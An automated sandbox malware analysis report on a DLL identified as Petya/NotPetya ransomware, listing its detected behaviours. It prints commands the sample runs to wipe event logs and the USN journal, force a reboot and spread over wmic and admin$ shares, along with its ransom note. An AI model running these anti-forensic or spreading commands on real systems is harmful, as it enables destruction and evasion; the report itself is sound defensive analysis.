Analysis Report

Overview

General Information

Joe Sandbox Version: 20.0.0
Analysis ID: 309071
Start time: 22:05:09
Joe Sandbox Product: Cloud
Start date: 12.07.2017
Overall analysis duration: 0h 10m 34s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: abc.dll
Cookbook file name: default.jbs
Analysis system description: Windows 7 (Office 2010 v14.0.4, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • VBA Instrumentation enabled
Detection: MAL
Classification: mal100.evad.spre.expl.rans.spyw.winDLL@21/7@0/5
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 90
  • Number of non-executed functions: 56
EGA Information:
  • Successful, ratio: 100%
Cookbook Comments:
  • Sleeps bigger than 20 are automatically reduced to 1
  • Found application associated with file extension: .dll
Warnings:
  • Connection to analysis system has been lost
  • Exclude process from analysis (whitelisted): conhost.exe, dllhost.exe
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtQueryDirectoryFile calls found.


Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Reporting: Report FP / FN
Detection: malicious


Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample sleeps for a long time, analyze it with the 'Bypass long sleeps' cookbook



Signature Overview


Operating System Destruction:

Contains functionality to access PhysicalDrive, possible boot sector overwrite
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E8CBF CreateFileA on filename \\.\PhysicalDrive0

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E1BA0 CryptStringToBinaryW,CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalAlloc,CryptDecodeObjectEx,CryptImportKey,LocalFree,LocalFree
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E1E51 CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptDestroyKey,CryptReleaseContext,LocalFree
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E1424 CryptAcquireContextA,GetLastError,GetLastError,CryptGenRandom,GetLastError,CryptReleaseContext
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E189A StrStrIW,CreateFileW,GetFileSizeEx,CreateFileMappingW,MapViewOfFile,CryptEncrypt,FlushViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E1C7F CryptExportKey,CryptExportKey,LocalAlloc,CryptExportKey,CryptBinaryToStringW,CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,LocalFree
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E1B4E CryptGenKey,CryptSetKeyParam,CryptSetKeyParam,CryptSetKeyParam

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E1BA0 CryptStringToBinaryW,CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalAlloc,CryptDecodeObjectEx,CryptImportKey,LocalFree,LocalFree
Clears the journal log
Source: unknown | Process created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: unknown | Process created: C:\Windows\System32\fsutil.exe fsutil usn deletejournal /D C:
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\fsutil.exe fsutil usn deletejournal /D C:
Clears the Windows event log
Source: unknown | Process created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Writes a notice file (html or txt) to demand a ransom
Source: C:\Windows\System32\rundll32.exe | File dropped: C:\README.TXT -> decryption service.we guarantee that you can recover all your files safely and easily.all you need to do is submit the payment and purchase the decryption key.please follow the instructions:1.send $300 worth of bitcoin to following address:1mz7153hmuxxtur2r1t78mgsdzaatnbbwx2.send your bitcoin wallet id and personal installation key to e-mail wowsmith123456@posteo.net.your personal installation key:aqiaaa5maaaapaaa++tyrumu+pfr/pqcpalhiajbcixd9om3nuqcxjh6gytiieggdriojyg0vc3ymlm0vm6dnuflp+ctfnhgemd286p6c9ooj4wewgzdnu+wphrgkgpuu75f2gqvetpqbyvpofidq0lfuixrlh9p/l7j2eox+b37pkl9gajy9ft9r7kxavoqvxni68rj7dmyrfytyy2amm10uvp8astgukmm0atzd7puxmbjenkjo/b3xomooqjxgevmikux9eacs2hhfjqata0pkd+/p8onhb4lllk1zyqudtralmi0s+ci4+yh+f3h0bzzwv0bd/dsk83/sjelc+iprfxtm6kcvqnfpa==
Petya / NotPetya detected (based on Eternalblue SMBv1 Shellcode pattern)
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E3CA0

Exploits:

Contains functionality to create an SMB header
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E2466 mov dword ptr [esi+04h], 424D53FFh
Connects to many different private IPs (likely to spread or exploit)
Source: global traffic | TCP traffic: 192.168.1.16:445
Source: global traffic | TCP traffic: 192.168.1.1:139
Source: global traffic | TCP traffic: 192.168.1.0:139
Source: global traffic | TCP traffic: 192.168.1.2:80
Source: global traffic | TCP traffic: 192.168.1.13:445
Connects to many different private IPs via SMB (likely to spread or exploit)
Source: global traffic | TCP traffic: 192.168.1.16:445
Source: global traffic | TCP traffic: 192.168.1.1:139
Source: global traffic | TCP traffic: 192.168.1.0:139
Source: global traffic | TCP traffic: 192.168.1.2:445
Source: global traffic | TCP traffic: 192.168.1.13:445

Networking:

Contains functionality to download additional files from the internet
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E67AF memset,select,recv,htons,recv
Urls found in memory or binary data
Source: rundll32.exe | String found in binary or memory: http://192.168.1.2/7

Boot Survival:

Contains functionality to infect the boot sector
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E1038 memset,memset,memset,GetSystemDirectoryA,GetLastError,CreateFileA,DeviceIoControl,GetLastError,_itoa,memcpy,memcpy,CloseHandle, \\.\PhysicalDrive
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E8CBF CreateFileA,DeviceIoControl,DeviceIoControl,LocalAlloc,DeviceIoControl,WriteFile,LocalFree,CloseHandle, \\.\PhysicalDrive0
Infects the boot sector of the hard disk
Source: C:\Windows\System32\rundll32.exe | File written: \Device\Harddisk0\DR0 offset: 0 (reported 4 times)
Uses schtasks.exe or at.exe to add and modify task schedules
Source: unknown | Process created: C:\Windows\System32\schtasks.exe schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11

Stealing of Sensitive Information:

Shows file infection / information gathering behavior (enumerates multiple directories for files)
Source: C:\Windows\System32\rundll32.exe | Directory queried: number of queries: 1011
Contains functionality to dump credential hashes (LSA Dump)
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_2_00F62143 GetProcAddress,GetModuleHandleW,GetProcAddress,RtlInitUnicodeString,GetProcAddress,GetProcAddress,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_1_00F62143 GetProcAddress,GetModuleHandleW,GetProcAddress,RtlInitUnicodeString,GetProcAddress,GetProcAddress,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress

Persistence and Installation Behavior:

Creates license or readme file
Source: C:\Windows\System32\rundll32.exe | File created: C:\README.TXT
Drops PE files
Source: C:\Windows\System32\rundll32.exe | File created: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp
Source: C:\Windows\System32\rundll32.exe | File created: C:\Windows\dllhost.dat
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\System32\rundll32.exe | File created: C:\Windows\dllhost.dat
May use bcdedit to modify the Windows boot settings
Source: loaddll32.exe | Binary or memory string: 03<bcdedit.exe`
Contains functionality to infect the boot sector
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E1038 memset,memset,memset,GetSystemDirectoryA,GetLastError,CreateFileA,DeviceIoControl,GetLastError,_itoa,memcpy,memcpy,CloseHandle, \\.\PhysicalDrive
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E8CBF CreateFileA,DeviceIoControl,DeviceIoControl,LocalAlloc,DeviceIoControl,WriteFile,LocalFree,CloseHandle, \\.\PhysicalDrive0
Infects the boot sector of the hard disk
Source: C:\Windows\System32\rundll32.exe | File written: \Device\Harddisk0\DR0 offset: 0 (reported 4 times)
Writes directly to the primary disk partition (DR0)
Source: C:\Windows\System32\rundll32.exe | File written: \Device\Harddisk0\DR0 offset: unknown length: 512 (reported 4 times)

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E9367 VirtualProtect,LoadLibraryA,GetProcAddress,VirtualProtect
Generates new code (likely due to unpacking of malware or shellcode)
Source: C:\Windows\System32\rundll32.exe | Code execution: Found new code
PE file contains an invalid checksum
Source: F915.tmp.2724.dr | Static PE information: real checksum: 0x18550 should be: 0x23f50
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_2_00F65955 push ecx; ret 5_2_00F65968
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_1_00F65955 push ecx; ret 5_1_00F65968
Contains functionality to check for running processes (XOR)
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E8677 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E1973 PathCombineW,FindFirstFileW,StrStrIW,WaitForSingleObject,PathCombineW,StrStrIW,PathFindExtensionW,wsprintfW,StrStrIW,FindNextFileW,FindClose
Creates COM task schedule object (often to register a task for autostart)
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} (reported 2 times)
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} (reported 2 times)
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs (reported 2 times)
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs (reported 2 times)
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid (reported 2 times)
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid (reported 2 times)
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID (reported 2 times)
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd} (reported 2 times)
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 (reported 5 times)
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Enumerates the file system
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Program Files\Adobe\Reader 11.0\Reader\AcroExt\locales\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Program Files\Adobe\Reader 11.0\Reader\AcroExt\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Program Files\Adobe\Reader 11.0\Reader\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Program Files\Adobe\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Program Files\Adobe\Reader 11.0\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Program Files\Adobe\Reader 11.0\Esl\
Shows file infection / information gathering behavior (enumerates multiple directories for files)
Source: C:\Windows\System32\rundll32.exe | Directory queried: number of queries: 1011
Contains functionality to enumerate network shares of other devices
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E9987 wsprintfW,wsprintfW,wsprintfW,WNetAddConnection2W,wsprintfW,PathFindExtensionW,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError, \\%s\admin$
Contains functionality to spread via wmic.exe
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E98AB GetSystemDirectoryW,PathAppendW,PathFileExistsW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,GetLastError

System Summary:

Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: abc.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: wdigest.pdb source: F915.tmp
Source: Binary string: wdigest.pdbJ6 source: F915.tmp
Binary contains paths to development resources
Source: rundll32.exe, abc.dll | Binary or memory string: MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68EZjK+cIiFlKeWndP0XfRCYXI9AJYCeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQABC:\Windows;.3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.%ws.*...Microsoft Enhanced RSA and AES Cryptographic ProviderREADME.TXTQ
Classification label
Source: classification engine | Classification label: mal100.evad.spre.expl.rans.spyw.winDLL@21/7@0/5
Contains functionality to adjust token privileges (e.g. debug / backup)
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E81BA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,SetLastError
Contains functionality to enum processes or threads
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E8677 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Contains functionality to load and extract PE file embedded resources
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E85D0 LoadResource,LockResource,SizeofResource,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree
Creates temporary files
Source: C:\Windows\System32\rundll32.exe | File created: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp
PE file has an executable .text section and no other executable section
Source: abc.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads software policies
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Runs a DLL by calling functions
Source: unknown | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\abc.dll,#1
Spawns processes
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\abc.dll'
Source: unknown | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\abc.dll,#1
Source: unknown | Process created: C:\Windows\System32\cmd.exe /c schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11
Source: unknown | Process created: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp 'C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp' \\.\pipe\{5F8C413D-F226-48C7-A40D-408B0F9CF420}
Source: unknown | Process created: C:\Windows\System32\schtasks.exe schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11
Source: unknown | Process created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: unknown | Process created: C:\Windows\System32\wevtutil.exe wevtutil cl Setup
Source: unknown | Process created: C:\Windows\System32\wevtutil.exe wevtutil cl System
Source: unknown | Process created: C:\Windows\System32\wevtutil.exe wevtutil cl Security
Source: unknown | Process created: C:\Windows\System32\wevtutil.exe wevtutil cl Application
Source: unknown | Process created: C:\Windows\System32\fsutil.exe fsutil usn deletejournal /D C:
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\abc.dll,#1
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\cmd.exe /c schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp 'C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp' \\.\pipe\{5F8C413D-F226-48C7-A40D-408B0F9CF420}
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wevtutil.exe wevtutil cl Setup
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wevtutil.exe wevtutil cl System
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wevtutil.exe wevtutil cl Security
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wevtutil.exe wevtutil cl Application
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\fsutil.exe fsutil usn deletejournal /D C:
Uses an in-process (OLE) Automation server
Source: C:\Windows\System32\schtasks.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)
Source: abc.dll | Static PE information: Section: .rsrc ZLIB complexity 0.999495577221
Contains functionality to call native functions
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E7DEB #1,WSAStartup,InitializeCriticalSection,CreateThread,CreateThread,SetThreadToken,ResumeThread,GetLastError,CloseHandle,SetLastError,CreateThread,SetThreadToken,ResumeThread,WaitForSingleObject,GetLastError,CloseHandle,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,GetProcessHeap,HeapFree,Sleep,Sleep,Sleep,memset,GetVersionExW,ExitProcess,Sleep,wsprintfW,GetModuleHandleA,GetProcAddress,NtRaiseHardError,InitiateSystemShutdownExW,ExitWindowsEx
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_2_00F618D9 NtQuerySystemInformation,GetModuleHandleW,GetProcAddress,NtQuerySystemInformation,LocalFree
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_2_00F61D5F GetCurrentProcess,NtQueryInformationProcess,RtlGetCurrentPeb
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_1_00F618D9 NtQuerySystemInformation,GetModuleHandleW,GetProcAddress,NtQuerySystemInformation,LocalFree
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_1_00F61D5F GetCurrentProcess,NtQueryInformationProcess,RtlGetCurrentPeb
Contains functionality to communicate with device drivers
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E8D5A CreateFileA,DeviceIoControl,LocalAlloc,SetFilePointer,WriteFile,LocalFree,CloseHandle
Contains functionality to launch a process as a different user
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E9987 wsprintfW,wsprintfW,wsprintfW,WNetAddConnection2W,wsprintfW,PathFindExtensionW,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError
Contains functionality to shutdown / reboot the system
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E7DEB #1,WSAStartup,InitializeCriticalSection,CreateThread,CreateThread,SetThreadToken,ResumeThread,GetLastError,CloseHandle,SetLastError,CreateThread,SetThreadToken,ResumeThread,WaitForSingleObject,GetLastError,CloseHandle,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,GetProcessHeap,HeapFree,Sleep,Sleep,Sleep,memset,GetVersionExW,ExitProcess,Sleep,wsprintfW,GetModuleHandleA,GetProcAddress,NtRaiseHardError,InitiateSystemShutdownExW,ExitWindowsEx
Creates files inside the system directory
Source: C:\Windows\System32\rundll32.exe | File created: C:\Windows\abc
Enables security privileges
Source: C:\Windows\System32\wevtutil.exe | Process token adjusted: Security
PE file contains executable resources (Code or Archives)
Source: dllhost.dat.2724.dr | Static PE information: Resource name: BINRES type: ump; PE32 executable for MS Windows (console) Intel 80386 32-bit
PE file has an invalid certificate
Source: abc.dll | Static PE information: invalid certificate
Reads the hosts file
Source: C:\Windows\System32\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts (reported 10 times)
Contains functionality to create processes via WMI
Source: rundll32.exe | Binary or memory string: -h "%ws:%ws"%dkernel32.dllIsWow64Process\\.\pipe\%ws"%ws" %wsiphlpapi.dllGetExtendedTcpTable%u.%u.%u.%uTERMSRV/127.0.0.1localhostSeTcbPrivilegeSeShutdownPrivilegeSeDebugPrivilegeC:\Windows\/c %wsComSpec\cmd.exewevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:schtasks %ws/Create /SC once /TN "" /TR "%ws" /ST %02d:%02dat %02d:%02d %wsshutdown.exe /r /f/RU "SYSTEM" dllhost.datntdll.dllNtRaiseHardError\\.\C:\\.\PhysicalDrive0255.255.255.255%u.%u.%u.%u%s \\%s -accepteula -s -d C:\Windows\System32\rundll32.exe "C:\Windows\%s",#1 wbem\wmic.exe%s /node:"%ws" /user:"%ws" /password:"%ws" process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 "\\%s\admin$\\%ws\admin$\%ws
Performs an instant shutdown (NtRaiseHardError)
Source: C:\Windows\System32\rundll32.exe | Hard error raised: shutdown

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to add an ACL to a security descriptor
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E73FD GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle
May try to detect the Windows Explorer process (often used for injection)
Source: rundll32.exe | Binary or memory string: Progman
Source: rundll32.exe | Binary or memory string: Program Manager
Source: rundll32.exe | Binary or memory string: Shell_TrayWnd

Anti Debugging:

Contains functionality to register its own exception handler
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_2_00F64CD8 SetUnhandledExceptionFilter
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_2_00F65F8E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_2_00F64AB6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_1_00F64CD8 SetUnhandledExceptionFilter
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_1_00F65F8E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_1_00F64AB6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Windows\System32\rundll32.exe | System information queried: KernelDebuggerInformation
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_2_00F65F8E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E9367 VirtualProtect,LoadLibraryA,GetProcAddress,VirtualProtect
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011EA073 GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree
Enables debug privileges
Source: C:\Windows\System32\rundll32.exe | Process token adjusted: Debug
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Process token adjusted: Debug

Malware Analysis System Evasion:

Contains functionality to enumerate / list files inside a directory
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E1973 PathCombineW,FindFirstFileW,StrStrIW,WaitForSingleObject,PathCombineW,StrStrIW,PathFindExtensionW,wsprintfW,StrStrIW,FindNextFileW,FindClose,1_2_011E1973
Program exit points
Source: C:\Windows\System32\rundll32.exe | API call chain: ExitProcess graph end node | graph_1-5851
Source: C:\Windows\System32\rundll32.exe | API call chain: ExitProcess graph end node | graph_1-5775
Source: C:\Windows\System32\rundll32.exe | API call chain: ExitProcess graph end node | graph_1-5906
Queries a list of all running processes
Source: C:\Windows\System32\rundll32.exe | Process information queried: ProcessInformation
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\loaddll32.exe | Thread delayed: delay time: -3000
Enumerates the file system
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Program Files\Adobe\Reader 11.0\Reader\AcroExt\locales\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Program Files\Adobe\Reader 11.0\Reader\AcroExt\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Program Files\Adobe\Reader 11.0\Reader\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Program Files\Adobe\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Program Files\Adobe\Reader 11.0\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Program Files\Adobe\Reader 11.0\Esl\
Found decision node followed by non-executed suspicious APIs
